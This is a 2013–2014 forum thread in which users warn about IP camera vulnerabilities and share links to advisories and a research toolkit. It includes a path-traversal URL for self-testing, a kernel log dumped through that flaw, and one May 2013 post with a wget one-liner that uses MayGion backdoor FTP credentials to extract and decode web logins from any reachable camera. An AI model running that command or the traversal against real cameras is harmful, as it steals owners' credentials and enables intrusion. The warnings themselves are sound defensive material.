News:

Registered a URL and setup a forum as the IPCam stuff really needed its own site vs my irregular blog posts about IPCam hacking at http://www.computersolutions.cn/blog

Author Topic: New IP Camera Exploits You Need To Be Aware Of  (Read 57726 times)

  • ***
March 12, 2013, 05:15:14 pm
Exploit for FI9820W/FI8608W cameras:

http://foscam.us/forum/important-make-sure-your-h-264-camera-has-latest-firmware-t3257-10.html?hilit=exploit#p18617

It should also be noted:

That many if not most MJPEG series IP Cameras, branded and non-branded, including clones, are currently exposed to this exploit without a firmware upgrade:

http://packetstormsecurity.com/files/120624/Foscam-Firmware-11.37.2.48-Path-Traversal.html

Because of this. If you find your camera exposed to this exploit. You should contact the seller and ask if they have a firmware update to resolve this issue.

Foscam. Does have firmware upgrades, to resolve this exploit, for the FI8903/4/5, FI8918 and FI8910, but NOT for the FI8908 series.

To test, if your camera is exposed to this exploit. Please do the following:

Legend

xxx.xxx.xxx.xxx = Local IP Address from within your local network or Your ISP IP Address or Your DDNS
#### = Port for camera

From any browser window enter ("Without any leading spaces. Note: The double forward slashes are required for this exploit and is not a mistake."):

Code: [Select]
http://xxx.xxx.xxx.xxx:####//proc/kcore
If you see data displayed as a result. Your camera currently is exposed to this exploit. A firmware upgrade IS required to change this.

Without any firmware upgrade. Your camera configuration information. Such as. WiFi information as well as DDNS information can/could be queried, in many, if not most cases, without the need to use any User Id and Password for the camera, to query this information. This may include data, such as your WiFi Key, SSID, as well as DDNS information and the DDNS password and other information, stored in the cameras configuration data.

Don
« Last Edit: May 12, 2013, 08:08:03 pm by TheUberOverLord »

April 11, 2013, 08:25:25 pm
I've just checked my Cheap Ebay clone, and guess what?, pages and pages of data. Mostly gobbledygook but I could make out stuff like user names and passwords, Router IP address and so on, A few odd words as well, like Elf, nonce and shat !. Weird !

Just as well it's going back tomorrow for a refund.

Pedro

  • ***
April 11, 2013, 08:37:37 pm
Actually. It just got worse!

While as an example. Foscam did release a firmware upgrade that resolved the issue about accessing this information without any login needed. I cannot say if other brands, models and clones, did same.

There is now a new published method to gain access to this data as an Operator User Level Id of the camera. Also, a toolkit was released to show others how to use this method and other newly published methods.

More here ("Note: Please review all the links below"):

Article: http://www.computerworld.com/s/article/9238329/Wireless_IP_cameras_open_to_hijacking_over_the_Internet_researchers_say

Author and Conference Presenters Blog Post: http://blog.shekyan.com/2013/03/hacking-ipcameras.html

Hack In The Box Conference Presentation Information used in the Presentation on April 11, 2013: http://conference.hitb.org/hitbsecconf2013ams/materials/D2T1%20-%20Sergey%20Shekyan%20and%20Artem%20Harutyunyan%20-%20Turning%20Your%20Surveillance%20Camera%20Against%20You.pdf

GetMeCamTool Toolkit Released: https://github.com/artemharutyunyan/getmecamtool

This was presented at the recent Hack In The Box Amsterdam convention as:

D2T1 - Sergey Shekyan and Artem Harutyunyan - Turning Your Surveillance Camera Against You

So. Not only is this now out in the public domain, again. There is a published toolkit that is command based, that can be used by virtually anyone, to attempt to very easily, abuse these exploits.

Just as one example. The toolkit supports replacing the Web UI ("Web User") interface, with different .html for the User page. That shows how to hide the last User Id, in the camera configuration. So, that the last User Id of 8 possible User Id's added to the camera. Does not display as being present. Allowing someone who has exploited the camera, to add and hide a User Id, from the cameras owner and other Admin Level User Id's of the camera.

Of course, the .html in most cases would need to be altered to match what it looked like before, but it shows others, how easy it is to add and hide a User Id, for the camera.

It should be noted. That you can still use the /get_params.cgi URL to see any and all User Id's that the camera has configured. But, using the standard camera interface, that comes with the camera, could in fact be used to hide, one or more, User Id's.

While none of the things the toolkit does are complicated or not known by others here on how to do these same things using other methods. This toolkit makes it much easier for others to now do same. With little or no knowledge about the cameras.

As stated. This published toolkit, is command based and has many other capabilities, once you gain Admin Level User Id access, to the camera. 

Don
 
« Last Edit: April 11, 2013, 09:18:33 pm by TheUberOverLord »

April 11, 2013, 08:58:46 pm
Crikey !,

Those links made for interesting reading. so much for going for a Foscam or Wansview, infact I've now gone off the idea of an IP camera all together !

Cheers

Pedro

April 14, 2013, 07:49:41 pm
Hi

Before I sent the camera back I decided to look a bit closer at the data produced by the exploit and found what looks very much like a Kernel Boot Log and partial Romfs log,,,and not a serial lead and solder iron in sight !.

I wouldn't imagine it would help me discover what make/model of camera it's been cloned from or for that matter any firmware/UI updates that would fix the exploit,,but its still interesting none the less.

See below, enjoy !.

ELF(44 tx”CORE|CORERvmlinuxroot=/dev/rom0 rwhCORE@
Linux version 2.4.20-uc0 (root@maverick-linux) (gcc version 3.0) #1482 ËÄ 6ÔÂ 16 01:00:08 CST 2011
Processor: Winbond W90N745 revision 1
Architecture: W90N745
On node 0 totalpages: 4096
zone(0): 0 pages.
zone(1): 4096 pages.
zone(2): 0 pages.
Kernel command line: root=/dev/rom0 rw
Calibrating delay loop... 39.83 BogoMIPS
Memory: 16MB = 16MB total
Memory: 14616KB available (1278K code, 206K data, 40K init)
Dentry cache hash table entries: 2048 (order: 2, 16384 bytes)
Inode cache hash table entries: 1024 (order: 1, 8192 bytes)
Mount-cache hash table entries: 512 (order: 0, 4096 bytes)
Buffer-cache hash table entries: 1024 (order: 0, 4096 bytes)
Page-cache hash table entries: 4096 (order: 2, 16384 bytes) <4>POSIX conformance testing by UNIFIX
Linux NET4.0 for Linux 2.4
Based upon Swansea University Computer Society NET3.039
Initializing RT netlink socket
Starting kswapd
PTZ Driver has been installed successfully.
Winbond W90N745 Serial driver version 1.0 (2005-08-15) with no serial options enabled ttyS00 at 0xfff80000 (irq = 9) is a W90N745
Winbond W90N7451 Serial driver version 1.0 (2005-08-15) with no serial options enabled ttyS00 at 0xfff80100 (irq = 10) is a W90N7451
I2C Bus Driver has been installed successfully.
Blkmem copyright 1998,1999 D. Jeff Dionne
Blkmem copyright 1998 Kenneth Albanowski
Blkmem 1 disk images:
0: 7F0E0000-7F1EC3FF [VIRTUAL 7F0E0000-7F1EC3FF] (RO)
S29GL032N Flash Detected
01 eth0 initial ok!
which:0
PPP generic driver version 2.4.2
Linux video capture interface: v1.00
Winbond Audio Driver v1.0 Initialization successfully.
usb.c: registered new driver hub
add a static ohci host controller device
: USB OHCI at membase 0xfff05000, IRQ 15
hc_alloc_ohci
usb-ohci.c: AMD756 erratum 4 workaround
hc_reset
usb.c: new USB bus registered, assigned bus number 1
hub.c: USB hub found
hub.c: 2 ports detected
usb.c: registered new driver audio
 audio.c: v1.0.0:USB Audio Class driver
usb.c: registered new driver serial
usbserial.c: USB Serial Driver core v1.4
rtusb init --->
usb.c: registered new driver rt2870
dvm usb cam driver 0.0.0.1 by Maverick Gao in 2010-8-3
usb.c: registered new driver dvm
dvm usb cam driver 0.1 for sonix288 by Maverick Gao in 2009-4-20
usb.c: registered new driver dvm usb cam driver for sonix288
NET4: Linux TCP/IP 1.0 for NET4.0
IP Protocols: ICMP, UDP, TCP
IP: routing cache hash table of 512 buckets, 4Kbytes
TCP: Hash tables configured (established 1024 bind 2048)
VFS: Mounted root (romfs filesystem) readonly.
Freeing init memory: 40K

ROMFS  ???

BINFMT_FLAT: bad magic/rev (0x74202d74, need 0x4)
BINFMT_FLAT: bad magic/rev (0x74202d74, need 0x4)
hub.c: connect-debounce failed, port 1 disabled
new USB device :80fcc004-fed740
hub.c: new USB device 1, assigned address 2
probing sonix288 usb camera ...
dvm camera registered as video0
p1[7]:1,j 3,config->bNumInterfaces:4
usbaudio: device 2 audiocontrol interface 2 has 1 input and 0 output AudioStreaming interfaces usbaudio: valid input sample rate 16000
usbaudio: device 2 interface 3 altsetting 1: format 0x00000010 sratelo 16000 sratehi 16000 attributes 0x01
usbaudio: valid input sample rate 48000
usbaudio: device 2 interface 3 altsetting 2: format 0x00000010 sratelo 48000 sratehi 48000 attributes 0x01
usbaudio: registered dsp 14,35
usbaudio: constructing mixer for Terminal 3 type 0x0101
usbaudio: warning: found 1 of 0 logical channels.
usbaudio: assuming the channel found is the master channel (got a Philips camera?). Should be fine.
usbaudio: registered mixer 14,32
usb_audio_parsecontrol: usb_audio_state at 00ff3680
new USB device :80fcc404-fed740
hub.c: new USB device 2, assigned address 3
Wait for auto-negotiation complete...OK
100MB - FULL
video0 opened
unknown command
audio_dev.state not AU_STATE_RECORDING
wb_audio_start_record




  • **
May 07, 2013, 07:06:54 am
It is interesting nobody has mentioned the back door in the MayGion cameras.  There are many public cameras you can connect to via FTP with the recovery password (the one listed on the MayGion site where it says "this is not a back door" even though it really is.)  You can then download the configuration file and base64 decode it to get the username and password for the web interface.  One more reason why devices like these with closed-source firmware should never be trusted on a public network!

Here's a one liner for anyone running Linux (and maybe Mac) that will get the login details for any camera you can connect to on port 21:

Code: [Select]
wget --ftp-user=MayGion --ftp-password=maygion.com ftp://$IP//tmp/eye/app/cs.ini -O - | grep ui= | cut -b 4- | base64 -d


  • ***
June 02, 2013, 08:42:58 pm
MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities:

http://www.exploit-db.com/exploits/25813/

Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities:

http://www.exploit-db.com/exploits/25815/

TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities

http://www.exploit-db.com/exploits/25812/

Don
« Last Edit: June 02, 2013, 09:12:04 pm by TheUberOverLord »

  • ***
August 14, 2013, 12:42:12 pm
Foscam FI8620:

http://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions

Hikvision IP Cameras Multiple Vulnerabilities:

http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities

More Here - Full current list of recent IP Camera vulnerabilities as of today here:

http://www.coresecurity.com/grid/advisories

Don

« Last Edit: August 14, 2013, 01:04:23 pm by TheUberOverLord »

  • ***
January 23, 2014, 06:21:27 pm
New bug found for Foscam MJPEG based cameras using .54 System firmware.

It's potentially possible, that other brands and clones using other system firmware versions are also vulnerable to this unauthorized access as well.

More here:

http://krebsonsecurity.com/2014/01/bug-exposes-ip-cameras-baby-monitors/

Don